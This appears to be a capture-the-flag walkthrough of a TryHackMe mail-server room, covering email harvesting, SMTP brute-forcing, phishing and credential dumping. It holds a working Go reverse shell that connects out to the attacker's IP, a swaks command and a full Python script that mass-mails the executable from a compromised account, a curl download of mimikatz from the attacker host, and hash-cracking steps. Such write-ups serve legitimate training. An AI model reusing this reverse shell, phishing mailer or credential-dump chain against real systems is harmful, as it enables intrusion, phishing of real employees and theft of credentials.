# You Got Mail

{% embed url="<https://tryhackme.com/room/yougotmail>" %}

The following post by 0xb0b is licensed under [CC BY 4.0<img src="https://mirrors.creativecommons.org/presskit/icons/cc.svg?ref=chooser-v1" alt="" data-size="line"><img src="https://mirrors.creativecommons.org/presskit/icons/by.svg?ref=chooser-v1" alt="" data-size="line">](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1)

***

## Recon

### Target

We start with an Nmap scan and find the usual Windows ports: 135 RPC, 139/445 SMB, 3389 RDP, 5985 WinRM and a set of dynamic RPC ports above 49000. Alongside these are the mail-related ports: 25 and 587 SMTP, 110 POP3 and 143 IMAP.

<figure><img src="/files/9dAaPh3hdU0TZu7JqBCb" alt=""><figcaption></figcaption></figure>

{% code overflow="wrap" %}

```
nmap -sC -sV -p 25,110,135,139,143,445,587,3389,5985,47001,49664-49669,49671,49673 ygm.thm -T4 
```

{% endcode %}

<figure><img src="/files/qrG0MPjuFLbbggQ9kFcZ" alt=""><figcaption></figcaption></figure>

### [brownbrick.co](https://brownbrick.co/)

In the assessment we are authorized for passive reconnaissance against `https://brownbrick.co/` only. On the Team page we find six mail addresses.

```
https://brownbrick.co/
```

<figure><img src="/files/rKQmDWBBaMu1W3NmS1lt" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/Sw8CpFd8wWrRCNAhlR8S" alt=""><figcaption></figcaption></figure>

We save those addresses to a file for later use.

```
oaurelius@brownbrick.co
tchikondi@brownbrick.co
wrohit@brownbrick.co
pcathrine@brownbrick.co
lhedvig@brownbrick.co
fstamatis@brownbrick.co
```

<figure><img src="/files/UDdxuHQTpoEcCMFbNAL9" alt=""><figcaption></figcaption></figure>

## Shell as wrohit

{% hint style="info" %}
Running cewl against the site is not passive reconnaissance as the scenario requires; it is included here for traceability and reproducibility. The password can also be read directly off the index page.
{% endhint %}

```
cewl --lowercase https://brownbrick.co/ > passwords.txt
```

We brute-force the SMTP login with the mail addresses as usernames and the keywords from the page as passwords (`-I` skips hydra's restore-file prompt). We get a hit for `lhedvig@brownbrick.co`.

```
hydra -L emails.txt -P passwords.txt ygm.thm smtp -I
```

<figure><img src="/files/Cm3QBvlKtVSy3f7bzAXf" alt=""><figcaption></figcaption></figure>

Now that we have a valid mail account, we can use it to send mail to the other addresses from an internal sender. Since the scenario is a phishing exercise, we keep it simple and attach an executable.

For this we use a reverse shell written in Go, the same one we already used in `AOC 24 Side Quest 4` <https://0xb0b.gitbook.io/writeups/tryhackme/2024/advent-of-cyber-24-side-quest/t4-krampus-festival#payload-preparation>.

{% code title="0xb0b.go" overflow="wrap" lineNumbers="true" %}

```go
package main

import (
    "net"
    "os/exec"
)

func main() {
    // Connect back to the attacker's listener (IP and port used in this writeup).
    c, err := net.Dial("tcp", "10.14.90.235:4445")
    if err != nil {
        return // no listener reachable: exit quietly rather than leave an error on the target
    }
    defer c.Close()

    // Wire an interactive PowerShell to the socket: stdin, stdout and stderr
    // all go over the connection, so whatever is typed on the listener runs here.
    cmd := exec.Command("powershell")
    cmd.Stdin = c
    cmd.Stdout = c
    cmd.Stderr = c
    cmd.Run() // blocks until the shell exits
}
```

{% endcode %}

We compile this on a Windows machine (see below). Go also cross-compiles, so `GOOS=windows GOARCH=amd64 go build -o 0xb0b.exe 0xb0b.go` on the attacking Linux box produces the same binary.

<figure><img src="/files/S9kRzTaewYdZbHj3pQUg" alt=""><figcaption></figcaption></figure>

Next, we use swaks with xargs to send one mail to each address we found, with the executable attached. Subject and body are kept simple.

{% code overflow="wrap" %}

```
xargs -I {} swaks --to "{}" --from "lhedvig@brownbrick.co" --header "Subject: kickoff documents" \
--body "see attached file" --attach-type application/octet-stream --attach @0xb0b.exe \
--server ygm.thm --port 25 --timeout 20s --auth LOGIN \
--auth-user lhedvig@brownbrick.co --auth-password REDACTED < emails.txt
```

{% endcode %}
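The same delivery step in Python, added here as an illustration and not code from the writeup. It builds the message shape swaks produces (a text body plus one `application/octet-stream` attachment in a `multipart/mixed` container), authenticates once with the captured account and loops over the saved address list, skipping the sender's own mailbox. The recipients and sender are the ones found above; the payload bytes, the `REDACTED` password and the `ygm.thm` server are placeholders, and the real executable would be read from `0xb0b.exe`.

```python
import smtplib
from email.message import EmailMessage
from typing import Callable, List

# Constructed inputs for this example: the addresses saved from the Team page,
# the compromised account, and a placeholder byte string standing in for the
# compiled Go reverse shell (read the real file with Path("0xb0b.exe").read_bytes()).
RECIPIENTS = [
    "oaurelius@brownbrick.co",
    "tchikondi@brownbrick.co",
    "wrohit@brownbrick.co",
    "pcathrine@brownbrick.co",
    "lhedvig@brownbrick.co",
    "fstamatis@brownbrick.co",
]
SENDER = "lhedvig@brownbrick.co"
SENDER_PASSWORD = "REDACTED"          # placeholder, as in the writeup
SMTP_SERVER, SMTP_PORT = "ygm.thm", 25
PAYLOAD_NAME = "0xb0b.exe"
PAYLOAD = b"MZ" + b"\x90" * 30        # placeholder bytes, not a real PE file


def build_lure(to_addr: str, from_addr: str, subject: str, body: str,
               attachment_name: str, attachment: bytes) -> EmailMessage:
    """Build the message swaks sends: a text body plus one
    application/octet-stream attachment, which turns the message into
    multipart/mixed."""
    msg = EmailMessage()
    msg["From"] = from_addr
    msg["To"] = to_addr
    msg["Subject"] = subject
    msg.set_content(body)
    msg.add_attachment(attachment, maintype="application",
                       subtype="octet-stream", filename=attachment_name)
    return msg


def targets(recipients: List[str], sender: str) -> List[str]:
    """Everyone on the list except the account we are sending from."""
    return [r for r in recipients if r.lower() != sender.lower()]


def send_all(recipients: List[str], build: Callable[[str], EmailMessage],
             server: str, port: int, user: str, password: str) -> List[str]:
    """Authenticate once (smtplib picks an AUTH mechanism from the EHLO
    response, like `swaks --auth LOGIN`) and send one message per recipient.
    Returns the addresses the server accepted a message for."""
    sent = []
    with smtplib.SMTP(server, port, timeout=20) as smtp:
        smtp.ehlo()
        if smtp.has_extn("starttls"):
            smtp.starttls()          # only if offered; plain port 25 here may not
            smtp.ehlo()
        smtp.login(user, password)
        for rcpt in recipients:
            smtp.send_message(build(rcpt))
            sent.append(rcpt)
    return sent


def lure(rcpt: str) -> EmailMessage:
    return build_lure(rcpt, SENDER, "kickoff documents",
                      "see attached file", PAYLOAD_NAME, PAYLOAD)


if __name__ == "__main__":
    # Start the listener first; this call needs network access to ygm.thm.
    for addr in send_all(targets(RECIPIENTS, SENDER), lure,
                         SMTP_SERVER, SMTP_PORT, SENDER, SENDER_PASSWORD):
        print("sent to", addr)
```

Inspecting `build_lure(...).as_string()` before sending is a cheap way to see exactly what the recipient's mail gateway will have to judge: an internal sender, a generic subject and an octet-stream attachment with an `.exe` name is the combination a mail filter should be flagging.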

<figure><img src="/files/3KHCdB1YAqRIQhAs0WDq" alt=""><figcaption></figcaption></figure>

We set up a listener before sending the mails...

<figure><img src="/files/axNjlweVpOFYnkZC15kJ" alt=""><figcaption></figcaption></figure>

... and shortly afterwards we receive a connection back as the user `wrohit`. The user flag is on the user's Desktop.

<figure><img src="/files/88bscNoGmG6hNgSjZIQw" alt=""><figcaption></figcaption></figure>

## wrohit Password

The user `wrohit` is a member of the local Administrators group.

<figure><img src="/files/CtJYizYRunQkynQpbwAS" alt=""><figcaption></figcaption></figure>

Furthermore, Windows Defender is not running, as `Get-MpComputerStatus` shows:

```
Get-MpComputerStatus
```

<figure><img src="/files/sOjs5Ks7YVAZgUPLvNDL" alt=""><figcaption></figcaption></figure>

With local admin rights and no AV in the way, we can run Mimikatz on the box and dump the local account hashes from the SAM with `lsadump::sam`.

```
curl http://10.14.90.235/mimikatz.exe -o mimikatz.exe
```

<figure><img src="/files/iWwkpDGhAyXD5vJ2uiTy" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/AG2wOWb69qSHJXdF4psk" alt=""><figcaption></figcaption></figure>

The NT hash of `wrohit` is crackable with a wordlist (hashcat mode 1000).

<figure><img src="/files/n1IjcRDYBiB7HNhMYe0y" alt=""><figcaption></figcaption></figure>

## hMailServer Administrator Password

The password hash for the hMailServer administrator dashboard is stored in `C:\Program Files (x86)\hMailServer\Bin\hMailServer.INI`, as the `AdministratorPassword` value in the `[Security]` section.

<figure><img src="/files/orgOkBQDjWZNizMNfIeR" alt=""><figcaption></figcaption></figure>

It is an unsalted MD5 hash, which cracks easily (hashcat mode 0):

<figure><img src="/files/IFWQGeb0cW9MsJLwEQg7" alt=""><figcaption></figcaption></figure>

